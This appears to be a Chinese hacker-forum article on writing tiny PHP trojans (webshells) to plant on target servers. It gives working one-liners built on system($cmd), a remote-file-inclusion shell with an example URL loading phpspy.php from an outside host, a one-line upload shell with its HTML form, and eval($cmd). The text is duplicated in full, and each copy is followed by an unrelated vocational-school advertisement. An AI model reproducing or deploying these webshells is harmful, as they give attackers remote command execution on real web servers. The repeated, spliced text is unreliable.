13308461099
微型PHP木馬的探討
減小字體
增大字體本文沒有什么特別之處,僅求拋磚引玉。并送給和我一樣菜的在PHP門邊徘徊的朋友。
剛學PHP沒幾天,我就急于功成,所以有錯誤及不足之處請大家積極指出。
PHP語法的強大是ASP望塵莫及的,僅一個:<? phpinfo();?>就可以刺探整個服務器的配置。運行cmd,上傳文件等,都是非常簡便的,現在用的好的PHP木馬,莫過于angel的phpspy了。昨天hak_ban問怎么給PHP木馬加密,我還沒想到,但是對于寫一個微型PHP木馬,我想還是很難被殺的。
這里簡單探討一下幾個函數可以作為木馬的使用:
1. 可以運行外部命令的幾個函數:system,passthru,exec,shell_exec,popen。
例:只要將<?system($cmd);?>等保存為cmd.php及可實現運行外部命令的功能。這幾個函數可以說是 早的微行php木馬了,所以一般虛擬主機的設置也會將這些函數屏蔽的。
2.還記得WDB論壇的style.php的漏洞嗎?我們可以利用這個做個很難被殺的小木馬。如下:
<?php include($include);?>
將其保存為1.php ,我們就可以調用其他不支持php服務器里的.php木馬(如phpspy.php)來達到我們的目的:http://target.com/1.php? Include=http://www.918x.com/phpspy.php
這里http://www.918x.com是不支持php的,否則將會在http://www.918x.com這臺服務器運行phpspy.php,而不是目標服務器。
3. 這個還是angel在Discuz 2.2F的攻擊中給我們的一個非常好的上傳木馬,我沒有改:
<?copy($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);?>
將其保存為up.php后,在本地提交表單:
<form ENCTYPE="multipart/form-data" ACTION="http://目標服務器/up.php" METHOD="POST">
<input NAME="MyFile" TYPE="file">
<input VALUE=" 提交 " TYPE="submit">
</form>
就可以把大個的php木馬上傳上去。
4. 我一直在想有沒有同冰狐浪子的那個ASP一句話木馬一樣通過本地表單提交運行的PHP木馬。終于找到了函數:eval,在PHP4中文參考手冊上它的語法說明:
語法: void eval(string code_str);
內容說明:本函數可將字符串之中的變量值代入,通常用在處理數據庫的資料上。參數 code_str 為欲處理的字符串。值的注意的是待處理的字符串要符合 PHP 的字符串格式,同時在結尾處要有分號。使用本函數處理后的字符串會沿續(xù)到 PHP 程序結束。
我們可以在目標主機上保存:<?eval($cmd);?>為一個PHP文件(我想也可以插在PHP任意文件里)。然后通過本地提交來達到目的,但與ASP不同的是,在magic_quotes_gpc = on的時候,過濾的很多的字符,使得這個使用功能大大的縮小。
對于這個PHP木馬本地表單我做了很多次,還沒有成熟的代碼。還請指教。寫好后會奉獻給大家的。但是eval這個函數可以做微型PHP木馬是無須質疑的。
Ps:寫完后,有人告訴我,其實早就有微型的PHP木馬了,只是沒有公開。哎,我好郁悶啊,研究的都是人家早就有了的成果。不管怎么樣,和大家分享一下我的研究,希望能得到幫助和指教。
湖南省陽光電子技術學校常年開設:手機維修培訓、家電維修培訓、電工培訓、電腦維修培訓、焊工培訓--面向全國火爆招生!網址:http://www.hnygpx.com 報名電話:13807313137)。安置就業(yè)。考試合格頒發(fā)全國通用權威證書。采用我校多年來獨創(chuàng)的“模塊教學法”,理論與實踐相結合、原理+圖紙+機器三位一體的教學模式,半天理論,半天實踐,通俗易懂,確保無任何基礎者也能全面掌握維修技能、成為同行業(yè)中的佼佼者。工作(一期不會,免費學會為止)。
剛學PHP沒幾天,我就急于功成,所以有錯誤及不足之處請大家積極指出。
PHP語法的強大是ASP望塵莫及的,僅一個:<? phpinfo();?>就可以刺探整個服務器的配置。運行cmd,上傳文件等,都是非常簡便的,現在用的好的PHP木馬,莫過于angel的phpspy了。昨天hak_ban問怎么給PHP木馬加密,我還沒想到,但是對于寫一個微型PHP木馬,我想還是很難被殺的。
這里簡單探討一下幾個函數可以作為木馬的使用:
1. 可以運行外部命令的幾個函數:system,passthru,exec,shell_exec,popen。
例:只要將<?system($cmd);?>等保存為cmd.php及可實現運行外部命令的功能。這幾個函數可以說是 早的微行php木馬了,所以一般虛擬主機的設置也會將這些函數屏蔽的。
2.還記得WDB論壇的style.php的漏洞嗎?我們可以利用這個做個很難被殺的小木馬。如下:
<?php include($include);?>
將其保存為1.php ,我們就可以調用其他不支持php服務器里的.php木馬(如phpspy.php)來達到我們的目的:http://target.com/1.php? Include=http://www.918x.com/phpspy.php
這里http://www.918x.com是不支持php的,否則將會在http://www.918x.com這臺服務器運行phpspy.php,而不是目標服務器。
3. 這個還是angel在Discuz 2.2F的攻擊中給我們的一個非常好的上傳木馬,我沒有改:
<?copy($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);?>
將其保存為up.php后,在本地提交表單:
<form ENCTYPE="multipart/form-data" ACTION="http://目標服務器/up.php" METHOD="POST">
<input NAME="MyFile" TYPE="file">
<input VALUE=" 提交 " TYPE="submit">
</form>
就可以把大個的php木馬上傳上去。
4. 我一直在想有沒有同冰狐浪子的那個ASP一句話木馬一樣通過本地表單提交運行的PHP木馬。終于找到了函數:eval,在PHP4中文參考手冊上它的語法說明:
語法: void eval(string code_str);
內容說明:本函數可將字符串之中的變量值代入,通常用在處理數據庫的資料上。參數 code_str 為欲處理的字符串。值的注意的是待處理的字符串要符合 PHP 的字符串格式,同時在結尾處要有分號。使用本函數處理后的字符串會沿續(xù)到 PHP 程序結束。
我們可以在目標主機上保存:<?eval($cmd);?>為一個PHP文件(我想也可以插在PHP任意文件里)。然后通過本地提交來達到目的,但與ASP不同的是,在magic_quotes_gpc = on的時候,過濾的很多的字符,使得這個使用功能大大的縮小。
對于這個PHP木馬本地表單我做了很多次,還沒有成熟的代碼。還請指教。寫好后會奉獻給大家的。但是eval這個函數可以做微型PHP木馬是無須質疑的。
Ps:寫完后,有人告訴我,其實早就有微型的PHP木馬了,只是沒有公開。哎,我好郁悶啊,研究的都是人家早就有了的成果。不管怎么樣,和大家分享一下我的研究,希望能得到幫助和指教。
湖南省陽光電子技術學校常年開設:手機維修培訓、家電維修培訓、電工培訓、電腦維修培訓、焊工培訓--面向全國火爆招生!網址:http://www.hnygpx.com 報名電話:13807313137)。安置就業(yè)。考試合格頒發(fā)全國通用權威證書。采用我校多年來獨創(chuàng)的“模塊教學法”,理論與實踐相結合、原理+圖紙+機器三位一體的教學模式,半天理論,半天實踐,通俗易懂,確保無任何基礎者也能全面掌握維修技能、成為同行業(yè)中的佼佼者。工作(一期不會,免費學會為止)。
[]
中查找“微型PHP木馬的探討”更多相關內容
中查找“微型PHP木馬的探討”更多相關內容
文章: